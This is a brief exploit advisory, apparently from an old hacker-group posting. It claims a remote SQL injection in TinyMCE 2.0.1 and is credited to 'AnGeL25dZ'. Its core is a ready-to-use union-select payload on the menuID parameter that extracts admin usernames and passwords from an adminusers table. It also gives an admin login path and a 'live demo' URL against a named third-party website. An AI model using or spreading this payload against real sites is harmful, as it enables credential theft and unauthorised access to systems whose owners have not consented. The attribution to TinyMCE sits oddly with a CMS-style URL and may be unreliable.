************************************************************ ** TinyMCE Remote SQL Injection ************************************************************ ** Prodcut: TinyMCE Version 2.0.1 ** Home : http://tinymce.moxiecode.com ** Vunlerability : 2/ SQL Injection ** Risk : high !! ** Dork : N/A ************************************************************ ** Discovred by: AnGeL25dZ ** From : Constantine - Algeria ** Contact : angel25dz@gmail.com ** ********************************************************* ** Greetz to : ALLAH ** All Members of HackTeachTeam http://www.hackteach.org/ ** Ra3ch, His0k4 ************************************************************ ** Remote SQL Injection vulnerability ** ** Exploit :index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers ** ** Use : http://[path]/Exploit ** Admin : http://[path]/cms/login.php **************************************************************** ** Live demo : http://www.uitgeverijginkgo.nl/index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers ** ****************************************************************